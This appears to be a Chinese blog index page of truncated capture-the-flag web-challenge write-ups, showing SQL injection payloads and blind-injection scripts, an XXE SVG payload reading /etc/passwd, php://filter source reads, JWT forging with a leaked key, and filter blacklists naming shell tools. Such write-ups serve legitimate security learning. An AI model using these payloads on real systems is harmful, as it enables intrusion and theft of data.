qaq517384的博客

考点：linux分号执行多条命令?正则匹配flag打开环境 <?phphighlight_file(__FILE__);$comm1 = $_GET['comm1'];$comm2 = $_GET['comm2'];if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep

考点：robots.txtjwt打开环境，超链接指向自己随便注册一个号传啥出啥的文件上传《经 验》robots.txt里有东西User-agent: * Disallow: /static/secretkey.txt访问一下，好，看不懂you-will-never-guess找其他线索的时候发现session是jwt格式的jwt解密user是1111，要输入一个your-256-bit-secret刚刚好上面那个就是secretkey.txtuser改admin复制

考点：绕过require_once()打开环境就是源码 <?phphighlight_file(__FILE__);require_once 'flag.php';if(isset($_GET['file'])) { require_once $_GET['file'];}第一反应是去百度绕过require_once()，毕竟见识小,小本本记一下php源码分析 require_once 绕过不能重复包含文件的限制/root/proc/self再多放几个也不是问题payloa

打开环境，要输对18位数字才能下一步给了被过滤的字符 UNION|SLEEP|’|"|OR|-|BENCHMARK在输入一个id后，会返回sql语句惯例先试万能密码，or过滤了还有and、&&、||1||1=1 limit 0,1有了，不加limit没结果，做完题瞅一眼源码<?php$link = mysqli_connect("database", "root", "password", "sql_injection");if (!$link) { ec

标题朴实无华的二次注入两个注入点，注册和改inforua' union select database() #在注册的user处可以找到二次注入点没有特殊的过滤,四步正常走就行rua' union select database() #rua' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #rua' union select gro

打开环境，后面那个切换主题不用管sign in要大于四个字符才写要求上传一张256X256像素内的图嗯？上传成功，然后没了哦，头像变了bp抓了一个jwt扫不出来又是一个原题给源码的<?phperror_reporting(0);require_once('config.php');require_once('lib/util.php');require_once('lib/session.php');$session = new SecureClientSession

打开环境是一个svg转png的参考合天的浅谈SVG的两个黑魔法 由SVG造成的XXE注入<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [<!ENTITY file SYSTEM "file:///etc/passwd" >]><svg height="200" width="1000"> <text x="10" y="20">&file;</text&g

打开环境,更换页面时有个action嗯，朴实无华，没有过滤的文件包含，真好

打开环境就是源码 <?php$MY = create_function("","die(`cat flag.php`);");$hash = bin2hex(openssl_random_pseudo_bytes(32));eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}");if(isset($_GET['func_name'])){ $_GET["func_name"]();

打开环境，只有登录和注册界面，admin已存在，随便注册一个算了登录后有两个选项头像界面就是一个文件上传，象征性的传一张，得到一个文件夹，可以正常访问用户信息界面还有url的user/user.php?id=2很明显的sql注入（如果考点是注入的话）看一眼题目，然后默默的吧id改成1,能看到admin但是没有用测了一下字符型和整形注入都没回显脚本不知道为什么没有返回值，浏览器是能成功访问的?id=1^(ascii(mid(user(),1,1))>0)就手注了一下user()是

打开环境是一个代码运行界面直接输入一个cat /flag，显示报错可以看到文件名/tmp/caas_6l09k25y.c（每次都不同），以及我们输入的代码编译一个hello word#include <stdio.h>int main() { printf("Hello, World! \n");}会弹出一个下载文件运行也能正确输出写了个读flag的脚本，后来发现，载下来的本地脚本跟环境的flag没有一点关系，淦回到开始的报错多打了一个字导致报错：找不到文件

dirsearch_master扫到www.zip解压得到index.php分为两部分登录和公钥私钥<?php header('Content-type:text/html; charset=utf-8');error_reporting(0);if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $Private_key = $_PO

进入题目发帖时提示要登录，密码用bp跑出来是666然后这个发帖形式很像上一题的二次注入，先构造sql语句，后面在留言界面输出稍微试了一下，有问题的都发不出留言在f12控制台发现这样一句话后，在url后添加.git被403禁止了，说明有git泄露githack载下来的源码跟没载一样<?phpinclude "mysql.php";session_start();if($_SESSION['login'] != 'yes'){ header("Location: ./l

看源码base321nD3x.php<?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<br /><font color=red><B>This is a very simple c

打开界面是一个有sql语句的登录框老本行robots.txt发现有提示$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";If $_POST['

打开环境有两个选项对注册的三个输入简单fuzz一下除了过滤的基本都能用作用户名，包括反斜杠，单双引号在正常登陆后，改密码时就可以看到由用户名不合法导致的报错 由报错语句：’"’" and pwd=‘c4ca4238a0b923820dcc509a6f75849b’’得到原本的sql应该是update table set username="$username" and password='$newpassword'这里就可以构造一个有关于报错注入的二次注入通过我们构造的sql语句，在改

F12能看到提示?file猜测文件包含，先是伪协议读源码?file=php://filter/convert.base64-encode/resource=index.php<?php//index.phpini_set('open_basedir', '/var/www/html/');// $file = $_GET["file"];$file = (isset($_GET['file']) ? $_GET['file'] : null);if (isset($file)){

扫！（或者靠经验先试）/robots.txt看源码发现已知的php只有user.php/image.php/index.php然后在image.php.bak里找到源码<?phpinclude "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes($id);$path=addslashes($path);$i

朴实无华一张图片，一个输入框，图片太大就不放了1是Nu1L，2是V&N，剩下都是“Error Occured When Fetch Result.”fuzz一下，507的都是被过滤了的过滤了关键的information，要用到无列名注入，找库名时需要用到用到5.7版本新增的sys库利用sys库里的三个表都行schema_table_statistics/schema_table_statistics_with_buffer/x$schema_flattened_keys表可以找到

[WUSTCTF2020]颜值成绩查询报了个session的错，先不管id输1234都有不同回显且url变为/?stunum=1,5就变成用户不存在了?stunum=1^0?stunum=1^0可以用异或盲注import requestsurl='http://3a1493b4-eefb-4eed-bb52-c5e5cfc25f91.node4.buuoj.cn:81/?stunum='flag=''for i in range(1,100): low = 32

有源码直接看源码了<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)");}if (isset($_GET['source'])) { highl

buu Phuck2在buu里打开环境是没有任何提示的，url后面加伤?hl才有源码脑测要fuzz或者原题有hint先放上师傅的bloghttps://www.dazhuanlan.com/tvshowwords/topics/958186直接看源码<?php stream_wrapper_unregister('php'); if(isset($_GET['hl'])) highlight_file(__FILE__); $mkdir = function($d

[CISCN2019 华北赛区 Day1 Web2]ikun打开题目是一个kunkun和一句买到lv6的话先注册一个登录栞栞，没有东西，应该就是要买lv6了点击下一页url加上了?page=2一开始循环里是url=url+str(i)然后就一直报500code，给自己一拳lv6每页都有所以要加.png结果是page=181import requestsurl="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh